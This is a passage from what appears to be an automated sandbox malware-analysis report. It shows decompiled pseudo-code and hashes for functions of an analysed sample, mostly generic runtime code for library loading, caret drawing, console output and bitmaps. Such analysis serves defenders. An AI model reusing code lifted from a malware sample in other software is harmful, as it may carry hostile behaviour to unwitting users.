                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: CreateEvent
                                                  • String ID:
                                                  • API String ID: 2692171526-0
                                                  • Opcode ID: 4460c440edb5648c1c51148899dbf798a26753bb2803d0fea49b810c808da3ed
                                                  • Instruction ID: b435e695817f24fc916923ad39d26ba6d7574a6bc083f6a686f384be04dcd0ed
                                                  • Opcode Fuzzy Hash: 4460c440edb5648c1c51148899dbf798a26753bb2803d0fea49b810c808da3ed
                                                  • Instruction Fuzzy Hash: 805131B4A00208EBDB14CF94C845FEEB775BF88714F24856AE615B62C0D7789A81CF99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004122AD Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004122AD(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x4219f0 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x419f20 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E00411D1A(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E00411D1A(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}













                                                  0x004122b6
                                                  0x00412360
                                                  0x004122be
                                                  0x004122c0
                                                  0x004122c7
                                                  0x004122c9
                                                  0x004122cf
                                                  0x004122dc
                                                  0x004122f1
                                                  0x004122f5
                                                  0x00412347
                                                  0x00412347
                                                  0x0041234c
                                                  0x00412350
                                                  0x00412353
                                                  0x00412353
                                                  0x00412359
                                                  0x0041235b
                                                  0x00412370
                                                  0x0041236b
                                                  0x0041236f
                                                  0x0041236f
                                                  0x0041235d
                                                  0x0041235d
                                                  0x00000000
                                                  0x0041235d
                                                  0x004122f7
                                                  0x00412300
                                                  0x00412337
                                                  0x00412337
                                                  0x00412339
                                                  0x0041233b
                                                  0x00000000
                                                  0x00000000
                                                  0x00412343
                                                  0x00000000
                                                  0x00412343
                                                  0x0041230a
                                                  0x0041230f
                                                  0x00412314
                                                  0x00000000
                                                  0x00000000
                                                  0x0041231e
                                                  0x00412323
                                                  0x00412328
                                                  0x00000000
                                                  0x00000000
                                                  0x0041232d
                                                  0x00412333
                                                  0x00000000
                                                  0x00412333
                                                  0x004122d4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004122da
                                                  0x00412369
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: api-ms-$ext-ms-
                                                  • API String ID: 0-537541572
                                                  • Opcode ID: 93b5113c307db85f7080e3c0f91dac82c6a8e5627c3d171d788b819ae0736209
                                                  • Instruction ID: 8e270c25f0c40604e1e93508219aae305a9c86a4957ce351f6409ea1989bea42
                                                  • Opcode Fuzzy Hash: 93b5113c307db85f7080e3c0f91dac82c6a8e5627c3d171d788b819ae0736209
                                                  • Instruction Fuzzy Hash: 09210832A01229BBCB224B349E45BDF37589B01760F240126ED25E7390D7BCED9285ED
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407A80 Relevance: 10.6, APIs: 7, Instructions: 64windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00407A80(void* __eflags, intOrPtr _a4, struct HDC__* _a8) {
				struct HDC__* _v8;
				struct HDC__* _v12;
				struct tagRECT _v28;
				struct HDC__* _t34;
				struct HWND__* _t39;

				_t34 = E00404150(_a4,  &_v28);
				if(_a8 == 0) {
					_t34 = GetDC( *(_a4 + 0xa8));
					_v12 = _t34;
				} else {
					_v12 = _a8;
				}
				_v8 = _v12;
				if(_v8 == 0) {
					return _t34;
				}
				if( *(_a4 + 0xa8) == GetFocus() &&  *((intOrPtr*)( *(_a4 + 8) + 0x18)) != 0) {
					HideCaret( *(_a4 + 0xa8));
				}
				InvertRect(_v8,  &_v28);
				if(_v8 != _a8) {
					ReleaseDC( *(_a4 + 0xa8), _v8);
				}
				_t39 = GetFocus();
				if( *(_a4 + 0xa8) == _t39) {
					_t39 =  *(_a4 + 8);
					if( *((intOrPtr*)(_t39 + 0x18)) != 0) {
						return ShowCaret( *(_a4 + 0xa8));
					}
				}
				return _t39;
			}








                                                  0x00407a8e
                                                  0x00407a97
                                                  0x00407aab
                                                  0x00407ab1
                                                  0x00407a99
                                                  0x00407a9c
                                                  0x00407a9c
                                                  0x00407ab7
                                                  0x00407abe
                                                  0x00000000
                                                  0x00000000
                                                  0x00407ad4
                                                  0x00407aec
                                                  0x00407aec
                                                  0x00407afa
                                                  0x00407b06
                                                  0x00407b16
                                                  0x00407b16
                                                  0x00407b1c
                                                  0x00407b2b
                                                  0x00407b30
                                                  0x00407b37
                                                  0x00000000
                                                  0x00407b43
                                                  0x00407b37
                                                  0x00407b4c

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: CaretFocus$HideInvertRectReleaseShow
                                                  • String ID:
                                                  • API String ID: 4235554027-0
                                                  • Opcode ID: 0a3188828ad0dd766e7147c10e1a667b5d4f81a6aaab61ad355cebeef794b6d8
                                                  • Instruction ID: d0a71b300b41c32ebc3c826b24e0b45d21065f0a536787294a67e111efead58d
                                                  • Opcode Fuzzy Hash: 0a3188828ad0dd766e7147c10e1a667b5d4f81a6aaab61ad355cebeef794b6d8
                                                  • Instruction Fuzzy Hash: 8521DB34A00208EFCB04DF94C488ADE7B75FB88345F24C1AAE9495B391CB35AE85DF95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00413FEC Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 83%
                                                  			E00413FEC(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				long _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				struct _OVERLAPPED* _t242;
				signed int _t244;
				intOrPtr _t247;
				signed int _t250;
				signed int _t251;
				signed int _t253;
				intOrPtr _t255;
				void* _t261;
				intOrPtr _t262;
				signed int _t263;
				signed int _t266;
				signed char _t267;
				intOrPtr _t270;
				signed int _t272;
				long _t273;
				signed int _t274;
				signed char* _t277;
				signed int _t280;
				signed int _t282;
				signed int _t286;
				signed int _t287;
				intOrPtr _t288;
				signed int _t289;
				struct _OVERLAPPED* _t291;
				struct _OVERLAPPED* _t293;
				signed int _t294;
				void* _t295;
				void* _t296;

				_t170 =  *0x41f638; // 0x3fbdb919
				_v8 = _t170 ^ _t294;
				_t172 = _a8;
				_t266 = _t172 >> 6;
				_t244 = (_t172 & 0x0000003f) * 0x38;
				_t277 = _a12;
				_v108 = _t277;
				_v80 = _t266;
				_v112 =  *((intOrPtr*)(_t244 +  *((intOrPtr*)(0x4217e8 + _t266 * 4)) + 0x18));
				_v44 = _t244;
				_v96 = _a16 + _t277;
				_t178 = GetConsoleOutputCP();
				_t242 = 0;
				_v124 = _t178;
				E0040E270( &_v72, _t266, 0);
				_t282 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t247 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t247;
				_v104 = _t277;
				if(_t277 >= _v96) {
					L48:
					__eflags = _v60 - _t242;
				} else {
					while(1) {
						_t250 = _v44;
						_v51 =  *_t277;
						_v76 = _t242;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0x4217e8 + _v80 * 4));
						_v48 = _t186;
						if(_t247 != 0xfde9) {
							goto L19;
						}
						_t211 = _t242;
						_t270 = _v48 + 0x2e + _t250;
						_v116 = _t270;
						while( *((intOrPtr*)(_t270 + _t211)) != _t242) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t272 = _v96 - _t277;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t277 & 0x000000ff) + 0x41fd78; // 0x0
							_t255 =  *_t72 + 1;
							_v48 = _t255;
							__eflags = _t255 - _t272;
							if(_t255 > _t272) {
								__eflags = _t272;
								if(_t272 <= 0) {
									goto L40;
								} else {
									_t287 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0x4217e8 + _v80 * 4)) + _t287 + _t242 + 0x2e)) =  *((intOrPtr*)(_t242 + _t277));
										_t242 =  &(_t242->Internal);
										__eflags = _t242 - _t272;
									} while (_t242 < _t272);
									goto L39;
								}
							} else {
								_v144 = _t242;
								__eflags = _t255 - 4;
								_v140 = _t242;
								_v56 = _t277;
								_v40 = (_t255 == 4) + 1;
								_t220 = E00414D3E( &_v144,  &_v76,  &_v56, (_t255 == 4) + 1,  &_v144);
								_t296 = _t295 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L48;
								} else {
									_t288 = _v48;
									goto L18;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t250 + _v48 + 0x2e) & 0x000000ff) + 0x41fd78)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t272) {
								__eflags = _t272;
								if(_t272 > 0) {
									_t289 = _t250;
									do {
										_t227 =  *((intOrPtr*)(_t242 + _t277));
										_t261 =  *((intOrPtr*)(0x4217e8 + _v80 * 4)) + _t289 + _t242;
										_t242 =  &(_t242->Internal);
										 *((char*)(_t261 + _v40 + 0x2e)) = _t227;
										_t289 = _v44;
										__eflags = _t242 - _t272;
									} while (_t242 < _t272);
									L39:
									_t282 = _v88;
								}
								L40:
								_t286 = _t282 + _t272;
								__eflags = _t286;
								L41:
								__eflags = _v60;
								_v88 = _t286;
							} else {
								_t273 = _v40;
								_t291 = _t242;
								_t262 = _v116;
								do {
									 *((char*)(_t294 + _t291 - 0xc)) =  *((intOrPtr*)(_t262 + _t291));
									_t291 =  &(_t291->Internal);
								} while (_t291 < _t273);
								_t292 = _v48;
								_t263 = _v44;
								if(_v48 > 0) {
									E0040CC90( &_v16 + _t273, _t277, _t292);
									_t263 = _v44;
									_t295 = _t295 + 0xc;
									_t273 = _v40;
								}
								_t280 = _v80;
								_t293 = _t242;
								do {
									 *( *((intOrPtr*)(0x4217e8 + _t280 * 4)) + _t263 + _t293 + 0x2e) = _t242;
									_t293 =  &(_t293->Internal);
								} while (_t293 < _t273);
								_t277 = _v104;
								_t288 = _v48;
								_v120 =  &_v16;
								_v136 = _t242;
								_v132 = _t242;
								_v40 = (_v56 == 4) + 1;
								_t237 = E00414D3E( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t296 = _t295 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L48;
								} else {
									L18:
									_t277 = _t277 - 1 + _t288;
									L27:
									_t277 =  &(_t277[1]);
									_v104 = _t277;
									_t193 = E00410EAF(_v124, _t242,  &_v76, _v40,  &_v32, 5, _t242, _t242);
									_t295 = _t296 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L48;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t242) == 0) {
											L47:
											_v92 = GetLastError();
											goto L48;
										} else {
											_t282 = _v84 - _v108 + _t277;
											_v88 = _t282;
											if(_v100 < _v56) {
												goto L48;
											} else {
												if(_v51 != 0xa) {
													L34:
													if(_t277 >= _v96) {
														goto L48;
													} else {
														_t247 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t242) == 0) {
														goto L47;
													} else {
														if(_v100 < 1) {
															goto L48;
														} else {
															_v84 = _v84 + 1;
															_t282 = _t282 + 1;
															_v88 = _t282;
															goto L34;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L49;
						L19:
						_t267 =  *((intOrPtr*)(_t250 + _t186 + 0x2d));
						__eflags = _t267 & 0x00000004;
						if((_t267 & 0x00000004) == 0) {
							_v33 =  *_t277;
							_t188 = E0040F703(_t267);
							_t251 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t251 * 2)) - _t242;
							if( *((intOrPtr*)(_t188 + _t251 * 2)) >= _t242) {
								_push(1);
								_push(_t277);
								goto L26;
							} else {
								_t100 =  &(_t277[1]); // 0x1
								_t202 = _t100;
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t274 = _v80;
									_t253 = _v44;
									 *((char*)(_t253 +  *((intOrPtr*)(0x4217e8 + _t274 * 4)) + 0x2e)) = _v33;
									 *(_t253 +  *((intOrPtr*)(0x4217e8 + _t274 * 4)) + 0x2d) =  *(_t253 +  *((intOrPtr*)(0x4217e8 + _t274 * 4)) + 0x2d) | 0x00000004;
									_t286 = _t282 + 1;
									goto L41;
								} else {
									_t206 = E004134E3( &_v76, _t277, 2);
									_t296 = _t295 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L48;
									} else {
										_t277 = _v56;
										goto L27;
									}
								}
							}
						} else {
							_v24 =  *((intOrPtr*)(_t250 + _t186 + 0x2e));
							_v23 =  *_t277;
							_push(2);
							 *(_t250 + _v48 + 0x2d) = _t267 & 0x000000fb;
							_push( &_v24);
							L26:
							_push( &_v76);
							_t190 = E004134E3();
							_t296 = _t295 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L48;
							} else {
								goto L27;
							}
						}
						goto L49;
					}
				}
				L49:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t294;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E0040AE5B(_v8 ^ _t294);
			}

















































































                                                  0x00413ff7
                                                  0x00413ffe
                                                  0x00414001
                                                  0x00414009
                                                  0x0041400c
                                                  0x00414019
                                                  0x0041401c
                                                  0x0041401f
                                                  0x00414026
                                                  0x0041402e
                                                  0x00414031
                                                  0x00414034
                                                  0x0041403a
                                                  0x0041403c
                                                  0x00414043
                                                  0x0041404d
                                                  0x0041404f
                                                  0x00414052
                                                  0x00414055
                                                  0x00414058
                                                  0x0041405b
                                                  0x0041405e
                                                  0x00414064
                                                  0x0041436f
                                                  0x0041436f
                                                  0x00000000
                                                  0x0041406a
                                                  0x00414072
                                                  0x00414075
                                                  0x0041407b
                                                  0x0041407e
                                                  0x00414085
                                                  0x0041408c
                                                  0x0041408f
                                                  0x00000000
                                                  0x00000000
                                                  0x00414098
                                                  0x0041409d
                                                  0x0041409f
                                                  0x004140a2
                                                  0x004140a7
                                                  0x004140ab
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004140ab
                                                  0x004140b0
                                                  0x004140b2
                                                  0x004140b7
                                                  0x00414171
                                                  0x00414178
                                                  0x00414179
                                                  0x0041417c
                                                  0x0041417e
                                                  0x00414322
                                                  0x00414324
                                                  0x00000000
                                                  0x00414326
                                                  0x00414326
                                                  0x00414329
                                                  0x00414338
                                                  0x0041433c
                                                  0x0041433d
                                                  0x0041433d
                                                  0x00000000
                                                  0x00414341
                                                  0x00414184
                                                  0x00414186
                                                  0x0041418c
                                                  0x0041418f
                                                  0x0041419b
                                                  0x004141a4
                                                  0x004141af
                                                  0x004141b4
                                                  0x004141b7
                                                  0x004141ba
                                                  0x00000000
                                                  0x004141c0
                                                  0x004141c0
                                                  0x00000000
                                                  0x004141c0
                                                  0x004141ba
                                                  0x004140bd
                                                  0x004140cc
                                                  0x004140cd
                                                  0x004140d0
                                                  0x004140d3
                                                  0x004140d8
                                                  0x004142ee
                                                  0x004142f0
                                                  0x004142f2
                                                  0x004142f4
                                                  0x004142fe
                                                  0x00414306
                                                  0x00414308
                                                  0x00414309
                                                  0x0041430d
                                                  0x00414310
                                                  0x00414310
                                                  0x00414314
                                                  0x00414314
                                                  0x00414314
                                                  0x00414317
                                                  0x00414317
                                                  0x00414317
                                                  0x00414319
                                                  0x00414319
                                                  0x0041431d
                                                  0x004140de
                                                  0x004140de
                                                  0x004140e1
                                                  0x004140e3
                                                  0x004140e6
                                                  0x004140e9
                                                  0x004140ed
                                                  0x004140ee
                                                  0x004140f2
                                                  0x004140f5
                                                  0x004140fa
                                                  0x00414104
                                                  0x00414109
                                                  0x0041410c
                                                  0x0041410f
                                                  0x0041410f
                                                  0x00414112
                                                  0x00414115
                                                  0x00414117
                                                  0x00414120
                                                  0x00414124
                                                  0x00414125
                                                  0x00414129
                                                  0x0041412f
                                                  0x00414138
                                                  0x00414145
                                                  0x0041414c
                                                  0x00414150
                                                  0x0041415b
                                                  0x00414160
                                                  0x00414166
                                                  0x00000000
                                                  0x0041416c
                                                  0x004141c3
                                                  0x004141c4
                                                  0x00414247
                                                  0x0041424e
                                                  0x00414256
                                                  0x0041425e
                                                  0x00414263
                                                  0x00414266
                                                  0x0041426b
                                                  0x00000000
                                                  0x00414271
                                                  0x00414286
                                                  0x00414366
                                                  0x0041436c
                                                  0x00000000
                                                  0x0041428c
                                                  0x00414295
                                                  0x00414297
                                                  0x0041429d
                                                  0x00000000
                                                  0x004142a3
                                                  0x004142a7
                                                  0x004142dd
                                                  0x004142e0
                                                  0x00000000
                                                  0x004142e6
                                                  0x004142e6
                                                  0x00000000
                                                  0x004142e6
                                                  0x004142a9
                                                  0x004142ab
                                                  0x004142ad
                                                  0x004142c6
                                                  0x00000000
                                                  0x004142cc
                                                  0x004142d0
                                                  0x00000000
                                                  0x004142d6
                                                  0x004142d6
                                                  0x004142d9
                                                  0x004142da
                                                  0x00000000
                                                  0x004142da
                                                  0x004142d0
                                                  0x004142c6
                                                  0x004142a7
                                                  0x0041429d
                                                  0x00414286
                                                  0x0041426b
                                                  0x00414166
                                                  0x004140d8
                                                  0x00000000
                                                  0x004141c8
                                                  0x004141c8
                                                  0x004141cc
                                                  0x004141cf
                                                  0x004141f1
                                                  0x004141f4
                                                  0x004141f9
                                                  0x004141fd
                                                  0x00414201
                                                  0x0041422f
                                                  0x00414231
                                                  0x00000000
                                                  0x00414203
                                                  0x00414203
                                                  0x00414203
                                                  0x00414206
                                                  0x00414209
                                                  0x0041420c
                                                  0x00414343
                                                  0x00414346
                                                  0x00414353
                                                  0x0041435e
                                                  0x00414363
                                                  0x00000000
                                                  0x00414212
                                                  0x00414219
                                                  0x0041421e
                                                  0x00414221
                                                  0x00414224
                                                  0x00000000
                                                  0x0041422a
                                                  0x0041422a
                                                  0x00000000
                                                  0x0041422a
                                                  0x00414224
                                                  0x0041420c
                                                  0x004141d1
                                                  0x004141d8
                                                  0x004141dd
                                                  0x004141e3
                                                  0x004141e5
                                                  0x004141ec
                                                  0x00414232
                                                  0x00414235
                                                  0x00414236
                                                  0x0041423b
                                                  0x0041423e
                                                  0x00414241
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00414241
                                                  0x00000000
                                                  0x004141cf
                                                  0x0041406a
                                                  0x00414372
                                                  0x00414372
                                                  0x00414374
                                                  0x00414377
                                                  0x00414377
                                                  0x00414377
                                                  0x00414377
                                                  0x00414389
                                                  0x0041438b
                                                  0x0041438c
                                                  0x0041438d
                                                  0x00414397

                                                  APIs
                                                  • GetConsoleOutputCP.KERNEL32(?,?,?), ref: 00414034
                                                  • __fassign.LIBCMT ref: 00414219
                                                  • __fassign.LIBCMT ref: 00414236
                                                  • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041427E
                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004142BE
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00414366
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 1735259414-0
                                                  • Opcode ID: 25405ef999baf99d50db2f777076ebd4317aa924b0d595818e575518d3e67d54
                                                  • Instruction ID: fb13085fe9f39d027224596580d8d7178c33383806ac5e50505dbf5f7aba09fc
                                                  • Opcode Fuzzy Hash: 25405ef999baf99d50db2f777076ebd4317aa924b0d595818e575518d3e67d54
                                                  • Instruction Fuzzy Hash: 92C19D75E002589FCB11CFE9C8809EDBBB5BF88314F28416AE865B7341D6359E82CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406E10 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 69%
                                                  			E00406E10(signed int _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _t96;
				void* _t104;
				struct HBITMAP__* _t114;
				signed int _t160;
				signed int _t172;

				_t2 = _a4 + 8; // 0x84918b08
				_v20 =  *((intOrPtr*)( *_t2 + 0x14));
				_t6 = _a4 + 8; // 0x84918b08
				if( *((intOrPtr*)( *_t6 + 0x18)) != 0 &&  *((intOrPtr*)(_a4 + 0xa8)) == GetFocus()) {
					DestroyCaret();
				}
				_t11 = _a4 + 0x84; // 0x8458b00
				if( *((intOrPtr*)( *_t11 + 0x10)) != 0) {
					_t14 = _a4 + 0x84; // 0x8458b00
					DeleteObject( *( *_t14 + 0x10));
				}
				_t17 = _a4 + 0x84; // 0x8458b00
				_t96 =  *_t17;
				 *((intOrPtr*)(_t96 + 0x10)) = 0;
				_t20 = _a4 + 0x84; // 0x8458b00
				_t160 =  *_t20;
				 *((intOrPtr*)(_t160 + 0x44)) = 0;
				if(_v20 != 0x64) {
					_t24 = _a4 + 8; // 0x84918b08
					asm("cdq");
					_v24 = ( *((short*)( *_t24 + 0x80)) + 0x0000000f & 0xfffffff0) + (_t160 & 0x00000007) >> 3;
					_t28 = _a4 + 8; // 0x84918b08
					_push( *((short*)( *_t28 + 0x82)));
					_push(_v24);
					_t104 = E0040DBE0();
					_v16 = _t104;
					if(_v16 != 0) {
						_t34 = _a4 + 8; // 0x84918b08
						asm("cdq");
						if( *( *_t34 + 0x82) * _v20 / 0x64 <= 1) {
							_v28 = 1;
						} else {
							_t42 = _a4 + 8; // 0x84918b08
							asm("cdq");
							_v28 =  *( *_t42 + 0x82) * _v20 / 0x64;
						}
						_v32 = _v28;
						_t54 = _a4 + 8; // 0x84918b08
						_v12 =  *((short*)( *_t54 + 0x82)) - _v32;
						while(1) {
							_t61 = _a4 + 8; // 0x84918b08
							if(_v12 >=  *((short*)( *_t61 + 0x82))) {
								break;
							}
							_v8 = 0;
							while(1) {
								_t172 = _a4;
								_t68 = _t172 + 8; // 0x84918b08
								if(_v8 >=  *((short*)( *_t68 + 0x80))) {
									break;
								}
								asm("cdq");
								asm("cdq");
								 *((char*)(_v16 + (_v8 + (0x00000080 >> (_v8 & 0x00000007) & 0x00000007) >> 3) + _v24 * _v12)) =  *(_v16 + _v24 * _v12 + (_v8 + (_t172 & 0x00000007) >> 3)) & 0x000000ff | 0x00000080;
								_v8 = _v8 + 1;
							}
							_v12 = _v12 + 1;
						}
						_t84 = _a4 + 8; // 0x84918b08
						_t87 = _a4 + 8; // 0x84918b08
						_t114 = CreateBitmap( *( *_t87 + 0x80),  *( *_t84 + 0x82), 1, 1, _v16);
						_t90 = _a4 + 0x84; // 0x8458b00
						 *( *_t90 + 0x10) = _t114;
						return E0040DBEB(_v16);
					}
					return _t104;
				}
				return _t96;
			}















                                                  0x00406e1a
                                                  0x00406e20
                                                  0x00406e26
                                                  0x00406e2d
                                                  0x00406e40
                                                  0x00406e40
                                                  0x00406e49
                                                  0x00406e53
                                                  0x00406e58
                                                  0x00406e62
                                                  0x00406e62
                                                  0x00406e6b
                                                  0x00406e6b
                                                  0x00406e71
                                                  0x00406e7b
                                                  0x00406e7b
                                                  0x00406e81
                                                  0x00406e8c
                                                  0x00406e95
                                                  0x00406ea5
                                                  0x00406eae
                                                  0x00406eb4
                                                  0x00406ebe
                                                  0x00406ec2
                                                  0x00406ec3
                                                  0x00406ecb
                                                  0x00406ed2
                                                  0x00406edc
                                                  0x00406eea
                                                  0x00406ef5
                                                  0x00406f15
                                                  0x00406ef7
                                                  0x00406efa
                                                  0x00406f08
                                                  0x00406f10
                                                  0x00406f10
                                                  0x00406f1f
                                                  0x00406f25
                                                  0x00406f32
                                                  0x00406f40
                                                  0x00406f43
                                                  0x00406f50
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f52
                                                  0x00406f64
                                                  0x00406f64
                                                  0x00406f67
                                                  0x00406f74
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f80
                                                  0x00406fa4
                                                  0x00406fb7
                                                  0x00406f61
                                                  0x00406f61
                                                  0x00406f3d
                                                  0x00406f3d
                                                  0x00406fcc
                                                  0x00406fda
                                                  0x00406fe5
                                                  0x00406fee
                                                  0x00406ff4
                                                  0x00000000
